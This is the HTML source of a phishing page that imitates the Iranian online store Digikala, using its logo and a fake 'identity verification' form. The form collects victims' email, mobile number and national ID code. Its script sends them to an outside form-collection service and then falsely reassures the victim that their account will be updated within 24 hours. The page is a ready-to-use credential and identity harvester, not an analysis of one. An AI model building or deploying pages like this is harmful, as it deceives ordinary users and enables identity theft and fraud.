<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <style>
        input{
            border:1px solid #ef4056;
            border-radius: 10px;
            width: 450px;
            height: 35px;
            font-weight: 10px;
            font-size: 25px;
        }
     button{
        background-color: var(--color-button-primary);
        border: 1px solid var(--color-button-primary);
        font-weight: 700;
        border-radius: 10px;
        width: 350px;
        height: 45px;
        color:white;
        line-height: 2.15;
        background-color: #ef4056;
}
.App{

    font-family: 'Times New Roman', Times, serif;    
    margin: 0;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
    text-align: center;
    border-radius: 10px;
    border: 0.05px rgb(202, 202, 202) solid;
    padding-left: 10px;
    padding-right: 10px;
    padding-top: 10px;
    padding-bottom: 10px;
}
label{
    font-size: 25px;
}
h1{
    font-size: 25px;
}
    </style>
    <div class="App">

        <img src="./فروشگاه اینترنتی دیجی_کالا_files/logo.svg">
        <h1>اهراز هویت|حساب کاربری</h1>
        <br >
        <h2>کد ملی فعلی : در دست چک</h2>
        <form id="my-form" action="https://formspree.io/f/mqkobldq" method="POST">
            <label>ایمیل:</label>
            <br />
            <br />
            <input type="email" name="email" />
            <br />
            <label>شماره مبایل:</label>
            <br />
            <br />

            <input type="text" name="message" placeholder="+98"/>
            <br>
            <label>کد ملی:</label>
            <br />
            <br />

            <input type="text" name="message" />
            <br />
            <br />
            <br />  
            <button id="my-form-button">احراز هویت</button>
            <p id="my-form-status"></p>
        </form>
    </div>
<!-- Place this script at the end of the body tag -->
<script>
    var form = document.getElementById("my-form");
    
    async function handleSubmit(event) {
      event.preventDefault();
      var status = document.getElementById("my-form-status");
      var data = new FormData(event.target);
      fetch(event.target.action, {
        method: form.method,
        body: data,
        headers: {
            'Accept': 'application/json'
        }
      }).then(response => {
        if (response.ok) {
          status.innerHTML = "اطلاعات شما بروز شد  در ۲۴ ساعت آینده به شمادر مورد حساب کاربری شما اطلاع خواهیم داد ";
          form.reset()
        } else {
          response.json().then(data => {
            if (Object.hasOwn(data, 'errors')) {
              status.innerHTML = data["errors"].map(error => error["message"]).join(", ")
            } else {
              status.innerHTML = "Oops! There was a problem submitting your form"
            }
          })
        }
      }).catch(error => {
        status.innerHTML = "Oops! There was a problem submitting your form"
      });
    }
    form.addEventListener("submit", handleSubmit)
</script>
</body>
</html>